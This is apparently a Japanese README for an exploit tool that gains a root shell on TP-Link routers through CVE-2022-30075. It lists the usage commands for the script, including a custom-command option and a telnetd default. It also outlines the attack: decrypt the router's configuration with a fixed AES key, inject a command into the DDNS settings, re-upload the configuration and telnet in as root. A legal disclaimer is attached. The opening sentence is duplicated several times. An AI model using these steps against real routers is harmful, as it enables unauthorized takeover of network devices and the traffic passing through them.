
TP-Link Router Authenticated RCE Exploit (CVE-2022-30075) このツールは、TP-Link Archer AX50 およびその他の一部のTP-Linkルーターモデルに存在する **CVE-2022-30075** 脆弱性を利用して、認証済みリモートコード実行 (Authenticated Remote Code Execution) を行います。
TP-Link Router Authenticated RCE Exploit (CVE-2022-30075) このツールは、TP-Link Archer AX50およびその他の一部のTP-Linkルーターモデルに存在する CVE-2022-30075 の脆弱性を利用して、認証済みリモートコード実行(Authenticated Remote Code Execution)を行います。
このツールは、TP-Link Archer AX50およびその他の一部のTP-Linkルーターモデルに存在する CVE-2022-30075 の脆弱性を利用して、認証済みリモートコード実行(Authenticated Remote Code Execution)を行います。
このツールを許可なく他のシステムで使用することは犯罪です
- 所有者であるか、テスト権限のあるデバイスでのみ使用してください
- 不正使用は違法であり、法的結果を招きます
- このツールを使用する前に、地域の法律に準拠していることを確認してください
- 開発者は、このツールの悪用によって生じた損害について一切の責任を負いません
pip install requests pycryptodome
基本的な使用方法
python exploit.py -t 192.168.0.1 -p router_sifresi
カスタムコマンドでの使用
python exploit.py -t 192.168.0.1 -p router_sifresi -c "touch /tmp/exploit"
バックアップの取得と復号化のみ
python exploit.py -t 192.168.0.1 -p router_sifresi -b
暗号化されたディレクトリの復元のみ
python exploit.py -t 192.168.0.1 -p router_sifresi -r /path/to/decrypted_directory
-t | ルーターのIPアドレス(必須)
-p | ルーター管理者パスワード(必須)
-c | 実行するコマンド(デフォルト: telnetd)
-b | バックアップの取得と復号化のみ
-r | 暗号化されたディレクトリの復元のみ
認証 - ルーターに管理者パスワードでログイン
設定のダウンロード - 暗号化された設定ファイルをルーターから取得
復号化 - 固定のAESキーを使用して設定を復号化
コマンド注入 - DDNS設定にターゲットコマンドを追加
暗号化 - 変更した設定を再度暗号化
復元 - 改変された設定をルーターにアップロード
アクセス - ルーター再起動後、telnetでrootシェルに接続
ルーターが再起動して数分後:
telnet 192.168.0.1
コマンドでrootシェルにアクセスできます。